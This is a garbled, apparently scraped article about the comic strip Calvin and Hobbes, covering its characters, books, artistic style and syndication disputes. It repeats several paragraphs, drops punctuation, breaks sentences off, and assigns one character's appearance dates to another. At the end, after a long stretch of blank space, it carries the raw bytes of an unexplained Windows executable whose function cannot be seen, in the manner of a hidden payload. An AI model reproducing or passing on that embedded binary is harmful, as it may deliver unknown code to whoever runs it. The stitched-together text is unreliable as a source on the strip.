Calvin is confronted every year with Christmas, as his mischievous nature conflicts with his greed for presents from Santa Claus which requires that he behave Calvin frets continually during the Christmas season, sometimes devising strategy by which to fool Santa Claus into giving him gifts Calvin's list of desired "loot," as he terms Christmas presents, is implied to include "incendiary weapons", of which some examples are given atom bombs, torpedoes, a heat-seeking guided missile, grenade launcher, etc in dialogue Most Christmas sequences of strips depict Calvin's parents playing the role of Santa Claus by secretly placing presents beneath the Christmas Tree or in Calvin's stocking; however, one later Sunday strip depicted Santa Claus discussing Calvin's list and history with one of his assistants, although the "reality" of this is left undefined Occasionally, a Christmas strip depicts some kindness shown by Calvin to Hobbes, as if to comment on the morals perceived as being part of the Christmas holiday One Sunday strip appeared as a poem entitled "Christmas Eve", featuring a described scene of Calvin sleeping beside Hobbes between the Christmas Tree and a fire

GROSS is Calvin's secret club, whose sole purpose is to exclude girls generally, and Susie Derkins specifically The name is an acronym that stands for Get Rid Of Slimy girlS Calvin admits "slimy girls" is a bit redundant, as all girls are slimy, "but otherwise it doesn't spell anything" GROSS is headquartered in a tree house Hobbes can climb up to the tree house, but Calvin requires a rope Hobbes refuses to drop down the rope until Calvin has said the password, which is an ode to tigers that is over eight verses long and occasionally accompanied by a dance Calvin and Hobbes are its only members, and each takes up multiple official titles while wearing newspaper chapeaux during meetings Most commonly, Calvin's title is Dictator-For-Life, and Hobbes is President and First Tiger The club has an anthem, but most of its words are unknown to outsiders Calvin often awards badges, promotions, etc, such as "Bottle Caps of Valor" Many GROSS plans to annoy or otherwise attack Susie end in failure, while many meetings end in a Calvinball-style battle of rule changes or promotion granting, before degenerating into a brawl

Both the Noodle Incident and the book Hamster Huey and the Gooey Kablooie: it is a fictional children's book written by Mabel Syrup, it has a sequel titled Commander Coriander Salamander and 'er Singlehander Bellylander, and it is best performed with squeaky voices, gooshy sound effects, and the "Happy Hamster Hop" In its first appearance, Calvin's dad recommended it to Calvin although Calvin was reluctant due to the fact there was not an animated adaptation of it, but nearly all subsequent references to the book show Calvin's dad's frustration at having to read the story to Calvin every evening

There are eighteen Calvin and Hobbes books, published from 1987 to 2005 These include eleven collections, which form a complete archive of the newspaper strips, except for a single daily strip from November 28, 1985 the collections do contain a strip for this date, but it is not the same strip that appeared in some newspapers The alternate strip, a joke about Hobbes taking a bath in the washing machine, has circulated around the Internet  Treasuries usually combine the two preceding collections albeit leaving out some strips with bonus material and include color reprints of Sunday comics

Watterson included a unique Easter egg in The Essential Calvin and Hobbes The back cover is a scene of a giant Calvin rampaging through a town The scene is in fact a faithful reproduction of the town square actually a triangle in Watterson's home town of Chagrin Falls, Ohio The giant Calvin has uprooted and is holding in his hands the Popcorn Shop, a small, iconic candy and ice cream shop overlooking the town's namesake falls

A complete collection of Calvin and Hobbes strips, in three hardcover volumes with a total 1440 pages, was released on October 4, 2005, by Andrews McMeel Publishing It also includes color prints of the art used on paperback covers, the treasuries' extra illustrated stories and poems, and a new introduction by Bill Watterson The alternate 1985 strip is still omitted, and two other strips January 7, 1987, and November 25, 1988 have altered dialog

To celebrate the release which coincided with the strip's ten year absence in newspapers and the twentieth anniversary of the strip, Calvin and Hobbes reruns were made available to newspapers from Sunday, September 4, 2005, through Saturday, December 31, 2005,

Early books were printed in smaller format in black and white; these were later reproduced in twos in color in the "Treasuries" Essential, Authoritative, and Indispensable" because as he says in The Calvin and Hobbes Tenth Anniversary Book" that he liked the fact that his strip was a "low-tech, one-man operation," and took great pride in the fact that he drew every line and wrote every word on his own

Except for the books, two 16-month calendars 1988–1989 and 1989–1990, the textbook Teaching with Calvin and Hobbes,

 Style and influences

Calvin and Hobbes strips are characterized by sparse but careful craftsmanship, intelligent humor, poignant observations, witty social and political commentary, and well-developed characters Precedents to Calvin's fantasy world can be found in Crockett Johnson's Barnaby, Charles M Schulz's Peanuts, Percy Crosby's Skippy, Berkeley Breathed's Bloom County, and George Herriman's Krazy Kat, while Watterson's use of comics as sociopolitical commentary reaches back to Walt Kelly's Pogo and Quino's Mafalda Schulz and Kelly, in particular, influenced Watterson's outlook on comics during his formative years

In initial strips, the drawings are three-dimensional Notable elements of Watterson's artistic style are his characters' diverse and often exaggerated expressions particularly those of Calvin, elaborate and bizarre backgrounds for Calvin's flights of fantasy, his friendship with Hobbes, his misadventures, his unique views on a diverse range of political and cultural issues and his relationships and interactions with his parents, classmates, educators, and other members of society The dual nature of Hobbes is also a recurring motif; Calvin sees Hobbes as a live tiger, while other characters see him as a stuffed animal

Even though the series does not mention specific political figures or current events like political strips such as Garry Trudeau's Doonesbury, it does examine broad issues like environmentalism, public education, and the flaws of opinion polls

Because of Watterson's strong anti-merchandising stance

History

Calvin and Hobbes was conceived when Watterson, having worked in an advertising job he detested,

The first strip was published on November 18, 1985 and the series quickly became a hit Within a year of syndication, the strip was published in roughly 250 newspapers By April 1, 1987, only sixteen months after the strip began, Watterson and his work were featured in an article by the Los Angeles Times

Before long, the strip was in wide circulation outside the United States

Watterson took two extended breaks from writing new strips: from May 1991 to February 1992, and from April through December 1994

In 1995, Watterson sent a letter via his syndicate to all editors whose newspapers carried his strip It contained the following:

    I will be stopping Calvin and Hobbes at the end of the year This was not a recent or an easy decision, and I leave with some sadness My interests have shifted however, and I believe I've done what I can do within the constraints of daily deadlines and small panels I am eager to work at a more thoughtful pace, with fewer artistic compromises I have not yet decided on future projects, but my relationship with Universal Press Syndicate will continue That so many newspapers would carry Calvin and Hobbes is an honor I'll long be proud of, and I've greatly appreciated your support and indulgence over the last decade Drawing this comic strip has been a privilege and a pleasure, and I thank you for giving me the opportunity

The 3,160th and final strip ran on Sunday, December 31, 1995

 Syndication and Watterson's artistic standards

From the outset, Watterson found himself at odds with the syndicate, which urged him to begin merchandising the characters and touring the country to promote the first collections of comic strips Watterson refused To him, the integrity of the strip and its artist would be undermined by commercialization, which he saw as a major negative influence in the world of cartoon art

Watterson also grew increasingly frustrated by the gradual shrinking of available space for comics in the newspapers He lamented that without space for anything more than simple dialogue or spare artwork, comics as an art form were becoming dilute, bland, and unoriginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate continued to charge newspapers full price to re-run old Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages

Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half of a newspaper or tabloid page Many editors and even a few cartoonists, such as Bil Keane The Family Circus, criticized him for what they perceived as arrogance and an unwillingness to abide by the normal practices of the cartoon business—a charge that Watterson ignored Watterson had negotiated the deal to allow himself more creative freedom in the Sunday comics Prior to the switch, he had to have a certain number of panels with little freedom as to layout, because in different newspapers the strip would appear at a different width; afterwards, he was free to go with whatever graphic layout he wanted, however unorthodox His frustration with the standard space division requirements is evident in strips before the change; for example, a 1988 Sunday strip published before the deal is one large panel, but with all the action and dialogue in the bottom part of the panel so editors could crop the top part if they wanted to fit the strip into a smaller space Watterson's explanation for the switch:

    I took a sabbatical after resolving a long and emotionally draining fight to prevent Calvin and Hobbes from being merchandised Looking for a way to rekindle my enthusiasm for the duration of a new contract term, I proposed a redesigned Sunday format that would permit more panel flexibility To my surprise and delight, Universal responded with an offer to market the strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes strips are characterized by sparse but careful craftsmanship, intelligent humor, poignant observations, witty social and political commentary, and well-developed characters Precedents to Calvin's fantasy world can be found in Crockett Johnson's Barnaby, Charles M Schulz's Peanuts, Percy Crosby's Skippy, Berkeley Breathed's Bloom County, and George Herriman's Krazy Kat, while Watterson's use of comics as sociopolitical commentary reaches back to Walt Kelly's Pogo and Quino's Mafalda Schulz and Kelly, in particular, influenced Watterson's outlook on comics during his formative years

In initial strips, the drawings have a more cartoony, flat, crude, Peanuts-like look; in the recent strips, the drawings are three-dimensional Notable elements of Watterson's artistic style are his characters' diverse and often exaggerated expressions particularly those of Calvin, elaborate and bizarre backgrounds for Calvin's flights of imagination, well-captured kinetics, and frequent visual jokes and metaphors In the later years of the strip, with more space available for his use, Watterson experimented more freely with different panel layouts, art styles, stories without dialogue, and greater use of whitespace He also made a point of not showing certain things explicitly: the "Noodle Incident" and the children's book Hamster Huey and the Gooey Kablooie were left to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes started, there were 64 colors available for the Sunday strips For the later Sunday strips, which are known for the technical skill Watterson displayed when given a more unrestricted layout, arguing that his layouts are best read not in terms of their use of space but in terms of their depiction of time
Named after the 16th-century theologian, Calvin is an impulsive, sometimes overly creative, imaginative, energetic, curious, intelligent, and often selfish six-year-old, whose last name is never mentioned in the strip Despite his low grades, Calvin has a wide vocabulary range that rivals that of an adult as well as an emerging philosophical mind:

        Calvin: "Dad, are you vicariously living through me in the hope that my accomplishments will validate your mediocre life and in some way compensate for all of the opportunities you botched"

        Calvin's father: "If I were, you can bet I'd be re-evaluating my strategy"

        Calvin later, to his mother: "Mom, Dad keeps insulting me"

He commonly wears his distinctive red-and-black striped shirt, black pants, magenta socks and white sneakers He is also a compulsive reader of comic books and has a tendency to order items marketed in comic books or on boxes of his favorite cereal, "Chocolate Frosted Sugar Bombs" Calvin chews gum regularly and subscribes to a magazine called Chewing Throughout the series, he is also revealed to be a "trial and error" sort of person Watterson has described Calvin thus:

     "Calvin is pretty easy to do because he is outgoing and rambunctious and there's not much of a filter between his brain and his mouth"
     "I guess he's a little too intelligent for his age The thing that I really enjoy about him is that he has no sense of restraint, he doesn't have the experience yet to know the things that you shouldn't do"

 Hobbes

    Main article: Hobbes Calvin and Hobbes

Hobbes

From everyone else's point of view, Hobbes is Calvin's stuffed tiger From Calvin's point of view, however, Hobbes is an anthropomorphic tiger, much larger than Calvin and full of independent attitudes and ideas But when the perspective shifts to any other character, readers again see merely a stuffed animal, usually seated at an off-kilter angle This is, of course, an odd dichotomy, and Watterson explains it thus:

    When Hobbes is a stuffed toy in one panel and alive in the next, I'm juxtaposing the "grown-up" version of reality with Calvin's version, and inviting the reader to decide which is truer

Hobbes' true nature is made more ambiguous by episodes that seem to attribute real-life consequences to Hobbes's actions One example is his habit of pouncing on Calvin the moment he arrives home from school, an act which always leaves Calvin with bruises and scrapes that are evident to other characters In another incident, Hobbes manages to tie Calvin to a chair in such a way that Calvin's father is unable to understand how he could have done it himself Yet another incident features Hobbes leaving Calvin hanging by the seat of his pants from a tree branch above Calvin's head

Hobbes is named after the 17th-century philosopher Thomas Hobbes, who had what Watterson described as "a dim view of human nature"

Although the first strips clearly show Calvin capturing Hobbes by means of a snare with tuna fish sandwich as the bait, a later comic August 1, 1989 seems to imply that Hobbes is, in fact, older than Calvin, and has been around his whole life Watterson eventually decided that it was not important to establish how Calvin and Hobbes had first met

 Supporting characters

    Main article: Secondary characters in Calvin and Hobbes

 Calvin's family
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other

Dad's first appearance: November 21, 1985 Last appearance: October 30, 1995 unseen speaking appearance on November 6, 1995

Miss Wormwood is Calvin's world-weary teacher, named after the apprentice devil in C S Lewis's The Screwtape Letters She perpetually wears polka-dotted dresses, and serves, like others, as a foil to Calvin's mischief Throughout the strip's run, various jokes hint that Miss Wormwood is waiting to retire, takes a lot of medication, and is a heavy smoker and drinker Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: November 21, 1985 Last appearance: October 30, 1995 unseen speaking appearance on November 6, 1995

Miss Wormwood is Calvin's world-weary teacher, named after the apprentice devil in C S Lewis's The Screwtape Letters She perpetually wears polka-dotted dresses, and serves, like others, as a foil to Calvin's mischief Throughout the strip's run, various jokes hint that Miss Wormwood is waiting to retire, takes a lot of medication, and is a heavy smoker and drinker Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: May 15, 1986 Last appearance: September 16, 1995

Rosalyn is a teenage high school senior and Calvin's official babysitter whenever Calvin's parents need a night out She is also his swimming instructor in one early sequence of strips She is the only babysitter able to tolerate Calvin's antics, which she uses to demand raises and advances from Calvin's desperate parents She is also, according to Watterson, the only person Calvin truly fears She does not hesitate to play as dirty as he does Calvin and Rosalyn usually do not get along, except in one case where she plays "Calvinball" with him in exchange for him doing his homework Rosalyn's boyfriend, Charlie, never appears in the strip but calls her occasionally while she babysits Originally she was created as a nameless, one-shot character with no plan for her to appear again; however, Watterson decided he wanted to retain her unique ability to intimidate Calvin, which ultimately led to many more appearances

 Moe
Moe, a bully at Calvin's school
Moe, a bully at Calvin's school
Moe, a bully at Calvin's school

First appearance: January 30, 1986 Last appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons Those Sunday strips were never reprinted in color until the Complete collection was finally published in 2005 Every book since Snow Goons has been printed in a larger format with Sundays in color and weekday and Saturday strips larger than they appeared in most newspapers Watterson also claims he named the books the "Essential, Authoritative, and Indispensable" because as he says in The                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               MZ�       ��  �       @                                   �   � �	�!�L�!This program cannot be run in DOS mode.
$       PE  L >6\V        � ! \       +?     p                         �
         @                   `� �   l� P    � �v                  p
  (  �                            � @            � h                          .text   �Z     \                   `.data   $c  p  d  `             @  �.idata  n	   �  
   �             @  @.rsrc   �v  �  x  �             @  @.reloc   (   p
  (   F
             @  B                                                                                                                                    @  B                                                                                                                                                                                                                                                                                                                        U��X��  h i�k+ ��]�����U�칈��6  h0i�K+ ��]�����U��h�P���  h@i�&+ ��]����������������U��hT����  hPi��* ��]����������������U��hX�0��n  h`i��* ��]����������������U��h\���>  hpi�* ��]����������������U��hd����  h�i�f* ��]����������������U��hh�x���  h�i�6* ��]����������������U��hp�8��  h�i�* ��]����������������U��hx�H��~  h�i��) ��]����������������U��h�����N  h�i�) ��]����������������U��h�� ��  h�i�v) ��]����������������U��h������  h�i�F) ��]����������������U��h ����  h�i�) ��]����������������U��h�� ��  h j��( ��]����������������U��h$����^  hj�( ��]����������������U��h,����.  h j�( ��]����������������U��h4�����  h0j�V( ��]����������������U��h<�`���  h@j�&( ��]����������������U��h@����  hPj��' ��]����������������U��hD�h��n  h`j��' ��]����������������U��hL����>  hpj�' ��]����������������U��hP���  h�j�f' ��]����������������U�����s  h�j�;' ��]�����U��h�j�%' ��]���������������U��h�j�' ��]���������������U��h�j��& ��]���������������U��h�j��& ��]���������������U��h�j�& ��]���������������U��Q�M��M��
  �M��i	  �E���]� U��Q�M��M���	  �M��	  �E���]� U��Q�M��EP�P  ���M��%	  �E���]� ������������U���*  ����u�}   r�MQ�   ����} t�UR��  ���3�]���U����E��#�E��M�;Mw�D$  �U�R�  ���E��}� t�	�wf 3�u�3�u�U���#����U��   k���U�E��
�E��]�������������U�����)  ����t0�MQ�e   ���E��UR�V   ���E��E�P�M�Q�  ���6�UR�5   ��P�,   ��Pj�Q  ���E�EP�   ���M����]�����U��E]���������U��j�h@Td�    Pd�%    �3)  ����t�MQ�! ���)�}   r�UR�EP�  ���MQ�UR�w! ���M�d�    ��]��������U��]������������U��j�h@Td�    Pd�%    �	�E���E�M;Mt�UR�<�����P�EP�  ���ԋM�d�    ��]�������������U����M��EP��������E��M��QR��������E�E��H�M��U�R�E�P�M�Q�|  ���U��B���M��A��]� ����U����M��E��E�M���M��UR�������E��E��Q�~������E�M��  �E�U�R�E�P�M�Q�  ���U��P�M��R�M��u   �E���M�U�����M���E��]� �������U��j�hPTd�    Pd�%    Q��8SVW�e��M�M��#  �EԋE�E̋M̉M��Ũ��U܋E��M+����   ���E�U܋E��
+����   ���EȋM���'  9E�u�=$  �Uȃ��U��E�P�M��8  �EЋM�Q�M��Y$  �E�kU��E�L�MċUĉU��E�    �EP�R������E�kM�M�Q�?������E��U�R�E�P�M�Q��  ��kU�U�U؋E܋M;u�U�R�E܋Q�U��P�M��Y#  �:�M�Q�UR�E��Q�M���"  �U�U�kE��M�TR�E܋Q�UR�M��"  �/�E�P�M�Q�M��  �U�R�E�P�M���%  j j ��+ � ��E�������E������M�Q�U�R�E�P�M��x  kE�E�M�d�    _^[��]� ��������������U��Q�E� �E��]��U����E��E����
�}���
v�  kE��]����������U��E� ]�������U����M��M��%  9Ev�e"  �E��H�M��UR�M���  �E�M���  �E�E��P�M��S"  �E���$  �ȅ�tj �U��R�E�P������P�	#  ���M��  �M��U�Q�E��M�H�UR�EP�M�Q�K�����P�M�  �}�r�U���R�E��Q�M��D$  �U��E����M�Q�U�R�������E���]� �U��j�hmTd�    Pd�%    ���EP��������E��MQ��������E�UR�EP�M���  �E�    �	�M����M��U�;U�t�E�P������P�M��x����؍M��  �E��E������M��  �E�M�d�    ��]������������U����#  ����t�MQ�5�����P�UR��   ���5�EP������Pj�?  ���E��MQ� ������E��U�R�M��n  ��]�����������U��Q�EP�������Pj��  ���E��MQ�������U�� ��E���]���������U��Q�EP������Pj�  ���E��MQ�y������U�� ��E���]���������U����EP�Q�����Pj�v  ���E��MQ�7������E��U�R�M��  ��]��U��EP�   ��]����������������U��j �M�  ]��U����M��E��E��M����M�U�E��
;Ht�UR�������P�M������-�EP�������E��M��U�E�P�M�Q�M��m����E�E��]� �U����E�M�;s�E�E���M�M��U��U��E���]����U����E�M�;s�E�E���M�M��U��U��E���]����U��Q�M��M��  �E��@    �M��A    �E���]�������U��Q�M��E��M��U��E�B�M��U�Q�E���]� ������U��Q�M��E��     �M��A    �U��B    �E���]������U��Q�M��E���]���U����M��E��E��M�  P�c������E�M��M��U�R�E�P�M�������M��M�h���M��  �UR�M��  �E���]� ��������������U��j�h�Td�    Pd�%    ���M�E�E�M�  P�M�Q��������E�U��U�E�P�M�Q�M��]����E�    �E���U�R�E�P�M��_  �MQ�M��S  �M��;  �E������E�M�d�    ��]� �U��j�h�Td�    Pd�%    ���M�E�E��M�Q�M������E�    �E���U�R�E�P�M���   �M��Y  �MQ�M���  �M��  �E������E�M�d�    ��]� �����������U����M��E��E��M�Q�M��$����U��U�h���M��  �M���  �E���]���U����M��E��E��M�Q�M������U��U�h���M��Q  �E���]�����������U��Q�M��E��     �E���]����������U��Q�M��E���]� U��Q�M�j�EP�M���   �M�����E���]� ���������U��Q�M��EP�M��}   �M�����E���]� �����������U��Q�M��EP�M������M�����E���]� �����������U��Q�M�h���M��\����E�� ���E���]�������������U��Q�M��E�� t�3ɋU����
�J�E���P�M��Q��" ���E���]� ����U��Q�M��E�� t�3ɋU����
�J�E��M�H�E���]� �U��Q�M��M��   ��]��������������U��Q�M��M��   ��]��������������U��Q�M��E��HQ�U��BP�M��R�0�������]����������U��Q�M��M���  �M��y�����]������U��Q�M��M���  ��]��������������U��Q�M���]������U��Q�M��M��1   ��]��������������U��Q�M��M��������]��������������U��Q�M��E�� t��M���Q��! ����]��������������U��E]���������U��Q�M��EP�M��  ��]� �������U����M��EP�MQ�UR�F  ���E� �E�P�MMQ�?  ����]� ������U��Q�M��M�������E��tj�M�Q� ���E���]� ��U��Q�M��M�������E��tj�M�Q�� ���E���]� ��U��Q�M��M�������E��tj�M�Q� ���E���]� ��U��Q�M��M�������E��tj�M�Q� ���E���]� ��U��j�hCWd�    Pd�%    ���  �M�������E�    h���M�������E��E�P�M���  �E� �M�����h���M�������E��M�Q�M��  �E� �M�����h ��M������E��U�R�M��t  �E� �M��h���h���|����x����E���|���P�M��E  �E� ��|����6���h���d����F����E���d���Q�M��  �E� ��d�������h���L��������E���L���R�M���  �E� ��L��������h ���4���������E���4���P�M��  �E� ��4��������M�M�}�  t�}�  �  �  h(�����������E������R�M��\  �E� ������M���h0�������]����E�	�����P�M��*  �E� ���������h8��������+����E�
������Q�M���  �E� �����������h@�������������E�������R�M���  �E� ����������hH�������������E�������P�M��  �E� ����������hP������������E�������Q�M��b  �E� �������S���hX��������c����E�������R�M��0  �E� �������!���h`�j �\�����  hh���t��������E���t���P�M���  �E� ��t��������hp���\���������E���\���Q�M��  �E� ��\�������hx���D��������E���D���R�M��  �E� ��D����v���h����,��������E���,���P�M��S  �E� ��,����D���j j h  �MQ�X�h��������A����E������R�M��  �E� ����������h�������������E�������P�M���  �E� �����������h��������������E�������Q�M��  �E� ����������h�������������E�������R�M��x  �E� �������i���h���������y����E�������P�M��F  �E� �������7���h���������G����E�������Q�M��  �E� ����������h�������������E�������R�M���  �E� �����������h����l���������E���l���P�M��  �E� ��l�������h����T��������E���T���Q�M��~  �E� ��T����o����U����  ��P�MQ�`�h����<����h����E���<���R�M��5  �E� ��<����&���h����$����6����E���$���P�M��  �E� ��$��������h������������E������Q�M���  �E� ����������h��������������E�������R�M��  �E� ����������h�������������E� ������P�M��m  �E� �������^���h���������n����E�!������Q�M��;  �E� �������,���h ��������<����E�"������R�M��	  �E� �����������h��������
����E�#������P�M���  �E� �����������h���|���������E�$��|���Q�M��  �E� ��|�������h���d��������E�%��d���R�M��s  �E� ��d����d���h ���L����t����E�&��L���P�M��A  �E� ��L����2����  h(���4����=����E�'��4���Q�M��
  �E� ��4��������h0�����������E�(�����R�M���  �E� ����������h8������������E�)�����P�M��  �E� ���������h@������������E�*������Q�M��t  �E� �������e���hH��������u����E�+������R�M��B  �E� �������3���hP��������C����E�,������P�M��  �E� ����������hX������������E�-������Q�M���  �E� �����������h`�������������E�.������R�M��  �E� ����������hh���t��������E�/��t���P�M��z  �E� ��t����k���j h�$ j hx  �|�Q�T�hp���\����`����E�0��\���R�M��-  �E� ��\�������hx���D����.����E�1��D���P�M���  �E� ��D��������h����,���������E�2��,���Q�M���  �E� ��,�������h�������������E�3�����R�M��  �E� ���������h�������������E�4������P�M��e  �E� �������V���h���������f����E�5������Q�M��3  �E� �������$���h���������4����E�6������R�M��  �E� �����������h�������������E�7������P�M���  �E� �����������h��������������E�8������Q�M��  �E� ����������h�������������E�9������R�M��k  �E� �������\���h����l����l����E�:��l���P�M��9  �E� ��l����*���h����T����:����E�;��T���Q�M��  �E� ��T��������h����<��������E�<��<���R�M���  �E� ��<��������h����$���������E�=��$���P�M��  �E� ��$��������E�   �E������M������E��*�h���X��8����E�    �E������M��r����E܋M�d�    ��]� ���������������U��j�h�Wd�    Pd�%    ���   �E�    �M�������E�    h��M������E��E�P�M���  �E� �M������h��M�������E��M�Q�M��  �E� �M�����h��M������E��U�R�M��  �E� �M�����h(��M������E��E�P�M��d  �E� �M��X���h4���l����h����E���l���Q�M��5  �E� ��l����&���h@���T����6����E���T���R�M��  �E� ��T��������j h�$ j hx  �|�P�T�hL���<���������E���<���Q�M��  �E� ��<�������hX���$��������E���$���R�M��  �E� ��$����v���hd�����������E�	�����P�M��S  �E� ������D���hX��M�����M���M��E������M��?����E�M�d�    ��]���������������U����E���#�U�
